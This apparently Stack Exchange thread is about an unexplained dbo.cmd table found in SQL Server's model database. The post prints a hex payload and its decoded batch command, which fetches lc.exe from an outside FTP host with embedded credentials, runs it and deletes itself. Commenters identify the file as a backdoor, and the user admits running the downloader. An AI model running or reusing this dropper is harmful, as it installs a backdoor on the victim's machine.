# New Database and it has a table `dbo.cmd` already

Tags: sql-server, sql-server-2014

I am creating a new database using the UI in SQL Server 2014 and when I open the tables it already has a table `dbo.cmd` as:

```
CREATE TABLE [dbo].[cmd](
    [a] [image] NOT NULL
) ON [PRIMARY] TEXTIMAGE_ON [PRIMARY]
```

It also has one row inserted as:

```
0x406364202573797374656D726F6F74255C68656C7026406563686F206F70656E2062326263732E676F746F667470312E636F6D3E536F2E3126406563686F2062326263733E3E536F2E3126406563686F2035357A65343235323E3E536F2E3126406563686F20676574206C632E6578653E3E536F2E3126406563686F206279653E3E536F2E312640667470202D733A536F2E312664656C20536F2E3126406C632E6578652664656C202530252665786974
```

I tried converting this into string and I got this:

```
@cd %systemroot%\help&@echo open b2bcs.gotoftp1.com>So.1&@echo b2bcs>>So.1&@echo 55ze4252>>So.1&@echo get lc.exe>>So.1&@echo bye>>So.1&@ftp -s:So.1&del So.1&@lc.exe&del %0%&exit
```

After focusing on this I found out that its a bash script and I tried executing the bash script and I got a file `lc.exe` in my folder `%systemroot%/Help/lc.exe`, I have not yet executed the last command from the script:

```
lc.exe&del %0%&exit
```

What is this? I have tried searching for this but could not find anything. I have no idea what's happening here, how can I figure this out?

Comment: how did you create the database ? with a script, with the UI, a restore, etc... ?

Comment: Does this table exist in the `model` database? Is lc.exe malware?

Comment: @irimias using the UI

Comment: @MartinSmith yes this table exists in `model` database

Comment: @MartinSmith it may be malware after executing it, it deleted it self.

Comment: Well you assume it deleted itself. It might have just moved itself to a different location. I would ensure you are not infected with any malware. Although by now there is a slight possibility that you might have a root kit installed on your system.

Comment: I just downloaded that file out of curiosity and windows defender instantly quarantined it as [Backdoor: Win32/Zegost.AD](https://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?name=Backdoor%3aWin32%2fZegost.AD&threatid=2147656985&enterprise=0)

Answer (score 8, accepted):

If your main question is  - why do you already have a table (with data) in a newly created database...?

All newly created Sql Server databases use the `MODEL` database as a template.  Therefore, I would expect to find dbo.cmd (with the data) already existing in the `MODEL` database.  Can you verify?

My guess is - someone in the past created dbo.cmd 'accidentally' in the MODEL database.

Comment: Yes the table is in model database, can you please tell me how can i check who create the table `cmd`? I am the only one using this server.

Comment: You might not be able to definitively tell who created the table - http://stackoverflow.com/questions/1255947/determine-what-user-created-objects-in-sql-server